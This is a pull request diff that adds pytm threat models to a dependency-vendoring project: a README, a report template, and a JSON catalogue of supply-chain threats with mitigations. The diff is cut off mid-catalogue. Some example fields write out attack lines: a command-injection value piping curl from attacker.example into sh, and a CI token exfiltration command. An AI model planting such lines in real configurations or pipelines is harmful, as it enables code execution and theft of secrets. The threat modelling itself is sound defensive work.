### PR TITLE
Add pytm threat models

### DIFF
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -157,6 +157,7 @@ disable = "logging-fstring-interpolation"
 min-similarity-lines = 10
 
 [tool.pylint.MASTER]
+ignored-modules = ["pytm"]
 ignore-paths = [
     "doc/_build/",
     "doc/_ext/sphinxcontrib_asciinema",

--- a/security/README.md
+++ b/security/README.md
@@ -1,0 +1,23 @@
+# Security
+
+This folder contains the threat models.
+
+They depend on features not yet in a pytm release; install a pinned commit
+until an official release is available:
+
+`pip install git+https://github.com/OWASP/pytm.git@279ed14aa13ea8f0b989717812fd4626bfcddf3d`
+
+To update the pin, verify the new commit in the upstream repository and replace
+the SHA above.
+
+After this you can generate various reports using:
+
+```bash
+python -m security.tm_supply_chain --report security/report_template.md > report.md
+python -m security.tm_supply_chain --dfd
+python -m security.tm_supply_chain --seq
+
+python -m security.tm_usage --report security/report_template.md > report_usage.md
+python -m security.tm_usage --dfd
+python -m security.tm_usage --seq
+```

--- a/security/report_template.md
+++ b/security/report_template.md
@@ -1,0 +1,114 @@
+## System Description
+
+{tm.description}
+
+## Dataflow Diagram - Level 0 DFD
+
+```dot
+{tm.dfd:call:}
+```
+
+## Dataflows
+
+Name|From|To |Data|Protocol|Port
+|:----:|:----:|:---:|:----:|:--------:|:----:|
+{dataflows:repeat:|{{item.display_name:call:}}|{{item.source.name}}|{{item.sink.name}}|{{item.data}}|{{item.protocol}}|{{item.dstPort}}|
+}
+
+## Data Dictionary
+
+{data:repeat:
+Name|{{item.name}}
+|:----|:----|
+Description|{{item.description}}|
+Classification|{{item.classification.name}}|
+Carried By|{{item.carriedBy:repeat:{{{{item.name}}}}<br>}}|
+Processed By|{{item.processedBy:repeat:{{{{item.name}}}}<br>}}|
+
+{{item:call:getInScopeFindings}}
+}
+
+## Actors
+
+{actors:repeat:
+Name|{{item.name}}
+|:----|:----|
+Description|{{item.description}}|
+Is Admin|{{item.isAdmin}}|
+Finding Count|{{item:call:getFindingCount}}|
+
+{{item:call:getInScopeFindings}}
+}
+
+## Boundaries
+
+{boundaries:repeat:
+Name|{{item.name}}
+|:----|:----|
+Description|{{item.description}}|
+In Scope|{{item.inScope}}|
+Immediate Parent|{{item.parents:if:{{item:call:getParentName}}}}{{item.parents:not:N/A, primary boundary}}|
+All Parents|{{item.parents:call:{{{{item.display_name:call:}}}}, }}|
+Classification|{{item.maxClassification}}|
+Finding Count|{{item:call:getFindingCount}}|
+
+{{item:call:getInScopeFindings}}
+}
+
+
+## Assets
+
+{assets:repeat:
+Name|{{item.name}}
+|:----|:----|
+Description|{{item.description}}|
+In Scope|{{item.inScope}}|
+Type|{{item:call:getElementType}}|
+Finding Count|{{item:call:getFindingCount}}|
+
+{{item:call:getInScopeFindings}}
+}
+
+
+## Data Flows
+
+{dataflows:repeat:
+Name|{{item.name}}
+|:----|:----|
+Description|{{item.description}}|
+Sink|{{item.sink}}|
+Source|{{item.source}}|
+Is Response|{{item.isResponse}}|
+In Scope|{{item.inScope}}|
+Finding Count|{{item:call:getFindingCount}}|
+
+{{item:call:getInScopeFindings}}
+}
+
+
+{tm.excluded_findings:if:
+# Excluded Threats
+}
+
+{tm.excluded_findings:repeat:
+<details>
+  <summary>
+    {{item:call:getThreatId}} - {{item:call:getFindingDescription}}
+  </summary>
+  <p>
+    <b>{{item:call:getThreatId}}</b> was excluded for
+    <b>{{item:call:getFindingTarget}}</b>
+    because of the assumption "{{item.assumption.name}}"
+  </p>
+  {{item.assumption.description:if:
+  <h6>Assumption description</h6>
+  <p>{{item.assumption.description}}</p>
+  }}
+  <h6>Severity</h6>
+  <p>{{item:call:getFindingSeverity}}</p>
+  <h6>Example Instances</h6>
+  <p>{{item:call:getFindingExample}}</p>
+  <h6>References</h6>
+  <p>{{item:call:getFindingReferences}}</p>
+</details>
+}

--- a/security/threats.json
+++ b/security/threats.json
@@ -1,0 +1,497 @@
+[
+  {
+    "SID": "DFT-01",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Unencrypted transport interception (MITM)",
+    "details": "A network-adjacent attacker intercepts an unencrypted data flow (HTTP, plaintext VCS protocol, or similar) and substitutes or reads content in transit.  Transport-layer attacks are invisible to the application when no channel encryption is enforced.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.controls.isPlaintext is True and target.controls.isNetworkFlow is True",
+    "prerequisites": "A tool or configuration accepts a plaintext-protocol URL (http://, svn://, git://).  The attacker has a network-adjacent position - shared LAN, BGP hijack, or compromised DNS resolver.",
+    "mitigations": "Restrict all configured URLs to encrypted transports (HTTPS, svn+https://, SSH).  Enforce the transport scheme at the configuration-validation layer so plaintext URLs are rejected at parse time.  Apply cryptographic integrity hashes to archive sources so substitution is detected even when transport is later found to have been intercepted.",
+    "example": "A CI runner on a shared cloud network fetches a dependency archive over http://.  A co-located attacker intercepts the TCP stream and replaces the archive bytes before they reach the build tool.",
+    "references": "https://capec.mitre.org/data/definitions/94.html, https://cwe.mitre.org/data/definitions/319.html"
+  },
+  {
+    "SID": "DFT-02",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Supply-chain content substitution via server-side compromise",
+    "details": "An attacker who compromises an upstream repository host, archive server, or CDN delivers malicious source code because no cryptographic content hash is verified end-to-end.  Transport security (TLS) protects only against network-layer interception; it cannot detect content that has been legitimately served but tampered with on the server before delivery.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.controls.providesIntegrity is False and target.controls.isNetworkFlow is True",
+    "prerequisites": "No integrity hash is declared for archive sources, or the dependency is a VCS reference (branch or tag) for which no hash equivalent is available.  The attacker controls or has compromised an upstream server, registry, or CDN node.",
+    "mitigations": "Require cryptographic integrity hashes for all archive dependencies.  Pin VCS dependencies to immutable commit SHAs rather than mutable branch or tag references.  Verify artifact signatures or SLSA provenance attestations where supported by the upstream.",
+    "example": "A project vendor hosts a tarball on a self-managed server.  An attacker who previously compromised the server replaces it with a backdoored version; the build tool downloads and vendors it without detecting the substitution.",
+    "references": "https://capec.mitre.org/data/definitions/186.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-03",
+    "target": [
+      "Process"
+    ],
+    "description": "Path traversal in archive or patch extraction",
+    "details": "A malicious archive member or patch file uses relative path sequences (e.g. ../../) or absolute paths to write files outside the intended extraction directory, potentially overwriting project sources, CI configuration, or secrets.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "Very High",
+    "condition": "target.controls.sanitizesInput is False",
+    "prerequisites": "The archive or patch file originates from an attacker-controlled or compromised upstream source.  The extraction process does not resolve and validate destination paths against an approved root directory.",
+    "mitigations": "Resolve every member's destination path - following symlinks - and reject any path whose canonical form lies outside the intended extraction root.  Validate all symlinks after extraction.  Reject patches whose headers reference paths outside the project boundary.",
+    "example": "A tarball contains the member ../../.github/workflows/publish.yml; without path-traversal checks this overwrites the CI publish workflow, injecting a secret-exfiltration step.",
+    "references": "https://capec.mitre.org/data/definitions/139.html, https://cwe.mitre.org/data/definitions/22.html, CVE-2001-1267"
+  },
+  {
+    "SID": "DFT-04",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Sensitive datastore write without content integrity verification",
+    "details": "A datastore that accepts write operations from potentially untrusted sources does not validate or verify the content being written.  An attacker with influence over the upstream source can inject malicious content that is consumed by downstream processes without detection.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.storesSensitiveData is True and target.hasWriteAccess is True and target.controls.validatesInput is False",
+    "prerequisites": "The attacker has write access to the upstream source - through a compromised server or local filesystem access.  The consuming process trusts the datastore content without re-validation.",
+    "mitigations": "Validate all content on read using a strict schema.  Apply cryptographic integrity hashes to detect substitution before content is written to sensitive datastores.  Restrict write access to trusted, authenticated sources only.",
+    "example": "Fetched source code is written to a vendor directory from an unverified HTTP source.  Because no integrity hash is present, injected malicious source passes undetected into the consumer's build.",
+    "references": "https://capec.mitre.org/data/definitions/438.html, https://cwe.mitre.org/data/definitions/345.html"
+  },
+  {
+    "SID": "DFT-05",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Mutable VCS reference enables silent content substitution",
+    "details": "A branch- or tag-pinned VCS dependency is a mutable reference.  An upstream maintainer or attacker with repository write access can silently change the content fetched on the next update - without any configuration diff, hash mismatch, or alerting mechanism being triggered.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "Medium",
+    "condition": "target.controls.isHardened is False and target.controls.providesIntegrity is False and target.controls.isNetworkFlow is True",
+    "prerequisites": "A dependency is pinned to a mutable VCS reference (branch or tag, not a full commit SHA).  The upstream repository permits force-pushes to the tracked reference, or an attacker has compromised a maintainer account.",
+    "mitigations": "Pin all VCS dependencies to a full, immutable commit SHA.  Periodically audit upstream refs against previously recorded SHAs.  Enable signed commits or tag verification where the upstream supports it.",
+    "example": "A dependency is pinned to a release tag v2.1.  A maintainer account is compromised; the attacker force-pushes a backdoored commit to that tag.  The next dependency update silently vendors the malicious code.",
+    "references": "https://slsa.dev/spec/v1.0/threats#b-submit-change, https://capec.mitre.org/data/definitions/690.html, https://cwe.mitre.org/data/definitions/829.html"
+  },
+  {
+    "SID": "DFT-06",
+    "target": [
+      "Process"
+    ],
+    "description": "Command injection via unsanitised subprocess input",
+    "details": "If external commands are invoked via a shell interpreter, or with unsanitised user-controlled strings interpolated into command arguments, an attacker who can influence configuration inputs can inject arbitrary shell commands that execute with the privileges of the calling process.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.invokesSubprocess is True and target.controls.usesParameterizedInput is False",
+    "prerequisites": "A process invokes external commands using a shell interpreter or string interpolation without strict sanitisation of inputs derived from untrusted sources such as configuration files, CLI arguments, or environment variables.",
+    "mitigations": "Invoke all external programs with shell execution disabled and using list-form argument passing.  Validate all configuration string fields with a strict allowlist regular expression before use as subprocess arguments.",
+    "example": "A manifest URL field contains '; curl attacker.example/exfil | sh'.  If the tool passes the URL to a shell command without proper argument isolation, the injected command executes in the build environment.",
+    "references": "https://capec.mitre.org/data/definitions/88.html, https://cwe.mitre.org/data/definitions/78.html"
+  },
+  {
+    "SID": "DFT-07",
+    "target": [
+      "Process"
+    ],
+    "description": "CI/CD secret exfiltration via supply-chain attack on build environment",
+    "details": "A compromised or malicious step in a CI/CD pipeline - injected via a pull request, a poisoned third-party action or plugin, or a backdoored build dependency - reads secrets from the runner environment and exfiltrates them over an outbound network channel.  Without strict egress controls, any code executing in the CI environment can access and transmit secrets.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.isHardened is False",
+    "prerequisites": "A pipeline step can run attacker-controlled code - through a malicious PR modifying pipeline configuration, a compromised third-party action or plugin, or a backdoored build dependency.  Outbound network access from the CI environment is not restricted to an explicit allowlist.",
+    "mitigations": "Pin all third-party CI actions and plugins to a full commit SHA.  Set the CI egress policy to block with an explicit allowlist of required hosts.  Scope secrets narrowly - avoid propagating all secrets to every pipeline job.  Require mandatory reviewer approval before privileged operations such as publish and deploy.",
+    "example": "A PR adds a pipeline step that runs curl -s $CI_TOKEN | attacker.example/collect.  Because egress is only audited (not blocked), the exfiltration succeeds and the attacker obtains a publish credential.",
+    "references": "https://slsa.dev/spec/v1.0/threats#e-build-process, https://capec.mitre.org/data/definitions/560.html, https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions"
+  },
+  {
+    "SID": "DFT-08",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Tampered secondary artifact suppresses or bypasses security checks",
+    "details": "An attacker with access to the local build environment or a compromised CI step tampers with a secondary artifact - dependency metadata, patch files, pipeline configuration, or security reports - to suppress security checks or inject malicious behaviour into subsequent pipeline runs.  Primary assets are protected; secondary ones are trusted implicitly.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Medium",
+    "condition": "target.controls.validatesInput is False and target.hasWriteAccess is True and target.storesSensitiveData is False",
+    "prerequisites": "The attacker has write access to the local repository or the CI runner's working directory.  Downstream processes consume the artifact without re-validation or integrity checking.",
+    "mitigations": "Apply integrity verification (checksums or signatures) to secondary build artifacts.  Treat dependency metadata as an append-only audit log where feasible.  Protect pipeline configuration files via branch-protection rules and mandatory code review.",
+    "example": "An attacker modifies a dependency metadata cache file to record a known-good hash for a compromised dependency, causing the up-to-date check to report no changes and suppressing the security alert.",
+    "references": "https://capec.mitre.org/data/definitions/268.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-09",
+    "target": [
+      "Process"
+    ],
+    "description": "Archive decompression bomb causes resource exhaustion",
+    "details": "A specially crafted archive (zip bomb, tar bomb) expands to an extremely large or deeply nested file tree, causing the extracting process to exhaust disk, memory, or CPU resources.  Without pre-extraction size and member-count limits the process may hang or crash, destabilising the build environment.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Medium",
+    "condition": "target.controls.checksInputBounds is False",
+    "prerequisites": "The archive originates from an attacker-controlled or compromised source.  The extraction process applies no upper bound on uncompressed size or total member count before or during extraction.",
+    "mitigations": "Enforce configurable upper limits on uncompressed size and member count, applied early in the streaming extraction loop before writing any bytes to disk.  Reject archives that exceed either threshold.",
+    "example": "A 42 KB zip bomb (42.zip) expands to 4.5 PB of nested zero-byte files; without a member-count limit the extraction loop runs indefinitely, exhausting disk space on the CI runner.",
+    "references": "https://capec.mitre.org/data/definitions/130.html, https://cwe.mitre.org/data/definitions/400.html"
+  },
+  {
+    "SID": "DFT-10",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Build or development dependency substitution via compromised registry",
+    "details": "A project's own build and development dependencies are fetched from a public registry without cryptographic hash verification.  A compromised registry mirror, BGP-hijacked endpoint, or DNS-spoofed response can substitute a malicious package that runs arbitrary code during installation or build, with access to CI/CD secrets.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.providesIntegrity is False and target.hasWriteAccess is False",
+    "prerequisites": "A public package registry or its DNS resolution is compromised.  The CI install step does not use hash-pinned dependency files (e.g. requirements files with integrity hashes, lockfiles with integrity fields).",
+    "mitigations": "Pin all build and development dependencies using cryptographic hashes in a lockfile or requirements file.  Use a private registry mirror with content verification.  Prefer installing from a pinned lockfile over loose version ranges in CI pipelines.",
+    "example": "A BGP hijack redirects package registry traffic to a malicious mirror that serves a backdoored build tool.  The backdoor runs at install time, exfiltrating the CI publish token before the build begins.",
+    "references": "https://capec.mitre.org/data/definitions/538.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-11",
+    "target": [
+      "Process"
+    ],
+    "description": "Privileged account compromise enables unauthorised merge or release",
+    "details": "A maintainer or repository-admin account with merge or release-trigger permissions is compromised through phishing, credential stuffing, session hijacking, or MFA bypass.  The attacker gains the ability to merge pull requests without peer review, push directly to protected branches, or trigger the release workflow - bypassing all branch-protection and review gates.  Once in control of the release pipeline, the attacker can publish a backdoored package without any automated block.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.hasAccessControl is True and target.controls.isHardened is False",
+    "prerequisites": "A maintainer account holds merge or release-trigger rights.  The repository does not require hardware-token MFA for privileged operations, or does not enforce mandatory second-approver sign-off on the release environment.",
+    "mitigations": "Enforce hardware-token MFA (FIDO2/WebAuthn) for all accounts with merge or publish rights.  Require deployment-environment reviewer approval before release pipelines execute.  Monitor for off-hours merges, single-approver releases, and unexpected publish events.  Rotate publish credentials immediately on suspected account compromise.",
+    "example": "An attacker phishes a maintainer's credentials and an SMS-based TOTP code.  They merge a backdoored PR in a low-traffic window, trigger the release workflow, and publish a malicious package before the compromise is detected.",
+    "references": "https://slsa.dev/spec/v1.0/threats#c-source-code-management, https://capec.mitre.org/data/definitions/194.html, https://docs.github.com/en/actions/security-guides/using-environments-for-deployment, https://cwe.mitre.org/data/definitions/306.html"
+  },
+  {
+    "SID": "DFT-12",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "SSRF via unvalidated HTTP redirect chain",
+    "details": "Tools that follow HTTP 3xx redirects when fetching remote resources may accept redirect targets without validating the destination host.  A compromised or malicious server can issue a redirect to an internal network address - such as cloud instance-metadata endpoints, container orchestration APIs, or any RFC-1918 address reachable from the build host - causing the tool to retrieve and store the response locally.  The resulting content may be extracted or logged, leaking internal credentials or configuration.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.controls.isHardened is False and target.controls.followsRedirects is True",
+    "prerequisites": "The tool is configured with an http:// URL, or an https:// URL that redirects through an unencrypted hop.  The build host has network access to internal metadata endpoints or private services.  The attacker controls or has compromised the server or an intermediate CDN node.",
+    "mitigations": "Validate that each redirect destination host is in an explicit allowlist before following it.  Reject redirects that resolve to RFC-1918, loopback, or link-local address ranges.  Enforce HTTPS for all configured URLs so both the original request and all redirects use encrypted transport.",
+    "example": "A manifest pins a dependency to http://files.example.com/lib-2.0.tar.gz.  The server responds with a 301 redirect to http://169.254.169.254/latest/meta-data/iam/security-credentials/role.  The tool follows the redirect, receives the JSON body containing AWS access keys, and writes it to a temporary file - leaving the credential on disk in the build environment.",
+    "references": "https://capec.mitre.org/data/definitions/664.html, https://cwe.mitre.org/data/definitions/918.html"
+  },
+  {
+    "SID": "DFT-13",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Credential embedded in source URL persisted to unencrypted metadata",
+    "details": "Dependency management tools often record the source URL in a metadata or lock file after a successful fetch.  If the URL contains an embedded credential in the userinfo component (user:password@host), that credential is written verbatim to the metadata file in plaintext.  Because metadata files are typically committed to version control, the credential propagates into the project's commit history and becomes readable by every repository clone, CI environment with checkout access, and any attacker who gains access to the repository.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.isCredentials is True and target.isStored is True and target.isDestEncryptedAtRest is False",
+    "prerequisites": "A user embeds a credential in a source URL instead of using an OS keychain, SSH agent, or CI secret store.  The tool's metadata file is committed to version control without sanitising the stored URL.",
+    "mitigations": "Detect the userinfo component in URLs at parse time and warn or reject them.  Strip embedded credentials from URLs before writing them to any persistent metadata file.  Document that credentials must be supplied through external credential helpers, not embedded in source URLs.  Run secret-scanning tooling as a pre-commit hook to catch inadvertent credential commits.",
+    "example": "A developer adds https://ci-bot:<TOKEN>@github.com/corp/private-lib.git to the manifest to access a private dependency from CI.  The tool fetches successfully and writes the full URL - including the token - to its metadata file.  A colleague commits both files; the token now appears in the repository's git history.",
+    "references": "https://capec.mitre.org/data/definitions/37.html, https://cwe.mitre.org/data/definitions/312.html, https://cwe.mitre.org/data/definitions/522.html"
+  },
+  {
+    "SID": "DFT-14",
+    "target": [
+      "Process"
+    ],
+    "description": "Dangerous file permission bits preserved during archive extraction",
+    "details": "TAR archives encode Unix file mode bits - including setuid (S_ISUID), setgid (S_ISGID), and sticky (S_ISVTX) - in each member header.  Archive extraction implementations that do not explicitly strip these bits before or after writing extracted files to disk will preserve them.  A malicious archive member with setuid-root mode produces an executable in the extraction directory that runs with elevated privileges when any user invokes it.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.isArchiveExtractor == True and target.controls.isHardened is False",
+    "prerequisites": "The archive extraction implementation does not explicitly strip or validate file mode bits.  The archive originates from an attacker-controlled or compromised source.  The host's umask does not independently strip setuid bits on extraction.",
+    "mitigations": "Explicitly strip setuid and setgid bits from all extracted members - either by clearing the bits before extraction or by applying permission normalisation afterwards.  Use extraction library versions or API options that apply a safe mode filter by default.  Validate that no extracted file has setuid, setgid, or world-writable bits before copying it to the final destination.",
+    "example": "A compromised upstream tarball contains a member with mode 04755 (setuid root, world-executable).  The extraction implementation does not strip the bit.  A later build step invokes the extracted binary, which runs as root and modifies a system file.",
+    "references": "https://capec.mitre.org/data/definitions/17.html, https://cwe.mitre.org/data/definitions/732.html, https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter"
+  },
+  {
+    "SID": "DFT-15",
+    "target": [
+      "Process"
+    ],
+    "description": "VCS externals / submodules trigger undeclared third-party fetches",
+    "details": "VCS client operations such as SVN export/checkout and Git submodule update can transparently fetch content from additional external URLs embedded in the repository's metadata (svn:externals properties, .gitmodules).  When a tool invokes these operations without suppressing external references, it silently retrieves content from sources not declared in the tool's own configuration.  These extra fetches bypass the tool's manifest-level controls: no integrity hash is checked, no configuration entry exists for the external source, and the fetched content is not subject to the same code-review or audit trail as declared dependencies.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.invokesSubprocess is True and target.controls.providesIntegrity is False and target.controls.isHardened is False",
+    "prerequisites": "The tool fetches an SVN repository or processes Git submodules without suppressing external references.  The upstream repository has externals or submodule entries defined.  The attacker controls an external URL referenced by the upstream repository, or can modify the upstream repository's external configuration.",
+    "mitigations": "Pass flags that suppress external reference processing (e.g. --ignore-externals for SVN) on every checkout or export operation.  Document whether the tool processes external references and advise users to declare them explicitly as separate dependency entries.  Warn or fail if external references are detected in a checked-out tree.",
+    "example": "A project depends on an SVN library.  A maintainer adds an svn:externals entry pointing to an attacker-controlled server.  The next dependency update silently checks out the injected content alongside the declared library with no manifest entry, no integrity check, and no audit trail.",
+    "references": "https://capec.mitre.org/data/definitions/186.html, https://svnbook.red-bean.com/en/1.7/svn.advanced.externals.html"
+  },
+  {
+    "SID": "DFT-16",
+    "target": [
+      "Process"
+    ],
+    "description": "Configured destination path allows writes to security-sensitive project directories",
+    "details": "Destination-path validation for vendored content typically prevents writes outside the project root (path traversal).  However, if no further constraints restrict writes to a designated vendor subdirectory, any within-root path is a valid destination - including security-sensitive files and directories such as CI pipeline definitions, build scripts, package manifests, and test fixtures.  This differs from path traversal (DFT-03): the path stays within the root and passes traversal checks, but deliberately targets files that control code execution in privileged contexts.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Very High",
+    "condition": "target.controls.sanitizesInput is True and target.controls.hasAccessControl is False",
+    "prerequisites": "The attacker has write access to the tool's configuration file - through direct repository access, a compromised maintainer account, or a successful configuration-tampering attack.  The target directory contains files that are executed with elevated privileges such as CI workflow definitions, build scripts, or test runners.",
+    "mitigations": "Maintain an explicit denylist of security-sensitive path prefixes and reject any configured destination that resolves under them.  Alternatively, require all destination paths to fall under a designated vendor root directory and reject paths outside it.  Raise a warning or error during code review when a destination points to a non-standard directory.",
+    "example": "An attacker with temporary repository access adds a dependency entry whose destination is the CI workflows directory, pointing at a fork that contains a backdoored pipeline file.  The next dependency update silently overwrites the legitimate workflow; the next CI run executes the attacker's pipeline and leaks a publish credential.",
+    "references": "https://capec.mitre.org/data/definitions/75.html, https://cwe.mitre.org/data/definitions/552.html"
+  },
+  {
+    "SID": "DFT-17",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Typosquatting or unverified source identity on an unauthenticated channel",
+    "details": "An attacker registers a confusable name on a public registry, or positions themselves as the responding server on an unauthenticated network channel.  Because the flow carries no access control, no code-signing verification, and no content-integrity check, the consumer cannot confirm that the bytes received originated from the expected publisher.  A name typo, a DNS hijack, or a BGP-level redirect is sufficient to deliver attacker-controlled content without any anomaly on the consumer's side.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.controls.usesCodeSigning is False and target.controls.providesIntegrity is False and target.controls.hasAccessControl is False and target.controls.isNetworkFlow is True",
+    "prerequisites": "The flow carries no access control that would bind the response to a verified publisher identity.  No cryptographic integrity hash or code-signing signature is verified on the received content.  The attacker can register a confusable name, intercept DNS/BGP resolution, or serve content from a co-located network position.",
+    "mitigations": "Verify package publisher identity and provenance attestations before installing from a public registry.  Pin all remote sources to cryptographic content hashes.  Restrict registry resolution to an explicit allowlist of permitted namespaces and publishers.  Subscribe to namespace-monitoring services that alert on new confusable-name registrations.",
+    "example": "An attacker registers a one-character misspelling of dfetch on PyPI.  Developers who mistype the install command receive the attacker's package, which runs a post-install script exfiltrating the build environment's CI secrets.",
+    "references": "https://slsa.dev/spec/v1.0/threats#h-package-selection, https://capec.mitre.org/data/definitions/693.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-18",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Dependency confusion - public registry package shadows private internal package",
+    "details": "An attacker discovers internal package names by reading error messages, source code, or published CI logs.  They publish a package with the same name to a public registry at a higher version number.  Build tools configured to search both a private registry and the public registry resolve the higher-versioned public entry first, silently replacing the internal dependency with attacker-controlled code that executes during installation or build.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.storesSensitiveData is False and target.hasWriteAccess is False and target.controls.providesIntegrity is False",
+    "prerequisites": "The organisation uses internal package names not registered in the public registry.  Build tooling falls back to a public registry when the private registry returns a 404.  The attacker identifies an internal package name and publishes a higher-versioned entry to the public registry before the organisation reserves the namespace.",
+    "mitigations": "Reserve all internal package namespaces in public registries even if the packages will never be published publicly.  Configure the build tool to resolve private packages only from the private registry with no public fallback.  Pin all dependencies to exact versions verified by cryptographic hash.  Audit registry search order and scoping explicitly.",
+    "example": "A CI workflow installs dev dependencies, one of which is an internal test helper not registered on PyPI.  An attacker finds the name in a build log and publishes a malicious package under that name at a higher version.  The next clean-environment CI run installs the attacker's package from PyPI instead of the internal source.",
+    "references": "https://slsa.dev/spec/v1.0/threats#h-package-selection, https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610, https://capec.mitre.org/data/definitions/693.html, https://cwe.mitre.org/data/definitions/829.html"
+  },
+  {
+    "SID": "DFT-19",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Malicious upstream update or intentional maintainer sabotage (protestware)",
+    "details": "A dependency maintainer - acting maliciously, under duress, or after account compromise - publishes a new version that contains deliberate malicious code: a backdoor, data-exfiltration payload, or destructive wiper.  Because the update is served under the maintainer's legitimate identity through the expected channel, transport-level security provides no protection.  Projects that pin to a mutable version reference or that automatically apply updates accept the malicious version without any alert.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Very High",
+    "condition": "target.storesSensitiveData is True and target.hasWriteAccess is True and target.controls.providesIntegrity is False",
+    "prerequisites": "A dependency has an active maintainer with publish rights.  The consuming project pins to a mutable reference (branch, tag, or loose version range) or enables automatic dependency updates.  No cryptographic verification of the specific artifact at a reviewed commit is performed before it is used.",
+    "mitigations": "Pin dependencies to exact, previously-reviewed immutable references (commit SHA or cryptographic hash).  Require explicit human review before upgrading any dependency.  Verify artifact signatures or SLSA provenance attestations where supported.  Monitor upstream release activity for unexpected or unexplained changes.  Apply runtime sandboxing to limit what any single installed package can access.",
+    "example": "An upstream library vendored by tag releases a patch that inserts an encoded payload in a helper function.  Because the dependency is pinned by tag rather than commit SHA and no integrity hash is verified for VCS dependencies, the next update fetch silently delivers the malicious code.",
+    "references": "https://slsa.dev/spec/v1.0/threats#a-producer, https://capec.mitre.org/data/definitions/186.html, https://cwe.mitre.org/data/definitions/494.html, https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-package-manifest/"
+  },
+  {
+    "SID": "DFT-20",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Abandoned package namespace reclaimed by malicious actor",
+    "details": "A widely-used open-source package becomes unmaintained and its registry entry, repository namespace, or domain name expires.  An attacker registers the abandoned name and begins publishing malicious releases.  Existing consumers who have not pinned to a specific, previously-reviewed version automatically receive the attacker's code on their next install or update.  Unlike a maintainer-compromise attack, there is no trust relationship to violate - the namespace change may go unnoticed for months.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.storesSensitiveData is False and target.hasWriteAccess is False and target.controls.validatesInput is False and target.controls.providesIntegrity is False",
+    "prerequisites": "A dependency is fetched from a public registry without cryptographic integrity verification.  The upstream project has been abandoned - no new releases or issue responses for an extended period.  The attacker successfully registers or reclaims the namespace before the original author or a trusted fork.",
+    "mitigations": "Audit all dependencies for maintenance health (last release date, issue response rate, contributor activity).  Pin to exact versions verified by cryptographic hash.  Consider in-tree vendoring or forking for critical dependencies that show signs of abandonment.  Subscribe to security advisories that track package-takeover events.",
+    "example": "A small utility library vendored across multiple projects is abandoned by its author.  Two years later an attacker registers the same name on PyPI at a much higher version number.  Projects that install with loose version constraints during CI receive the attacker's package instead of the last legitimate release.",
+    "references": "https://capec.mitre.org/data/definitions/693.html, https://cwe.mitre.org/data/definitions/829.html"
+  },
+  {
+    "SID": "DFT-21",
+    "target": [
+      "Dataflow"
+    ],
+    "description": "Unsigned or forged VCS tag accepted as a trusted version pin",
+    "details": "VCS tags are mutable, unsigned labels that any repository contributor with push rights can create, move, or delete.  A build tool that resolves a dependency by tag name without verifying a cryptographic signature cannot distinguish a legitimate tag from one force-moved to a different commit by a compromised account or malicious maintainer.  The attacker updates the commit that the tag points to; the next fetch silently retrieves different content under the same version label.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.usesCodeSigning is False and target.controls.providesIntegrity is False and target.controls.hasAccessControl is True and target.controls.isNetworkFlow is True",
+    "prerequisites": "The dependency is pinned by a tag name rather than a full commit SHA.  The upstream VCS host allows tag force-push without signature verification.  The consuming tool does not verify a cryptographic signature on the resolved tag object before accepting the commit.",
+    "mitigations": "Pin all VCS dependencies to full, immutable commit SHAs rather than tag names.  When the upstream project provides GPG-signed tags or Sigstore tag attestations, verify the signature before accepting the commit.  Periodically audit recorded SHAs against upstream tags to detect silent force-pushes.",
+    "example": "A library is pinned to a release tag in the manifest.  A maintainer account is compromised; the attacker force-pushes a backdoored commit to that tag.  Because the inbound VCS content arrives over an authenticated HTTPS channel with no end-to-end integrity hash, the next dependency update fetches the substituted commit without any warning.",
+    "references": "https://capec.mitre.org/data/definitions/690.html, https://cwe.mitre.org/data/definitions/345.html"
+  },
+  {
+    "SID": "DFT-22",
+    "target": [
+      "Datastore"
+    ],
+    "description": "Vendored content contains submodule or nested external reference triggering undeclared fetch",
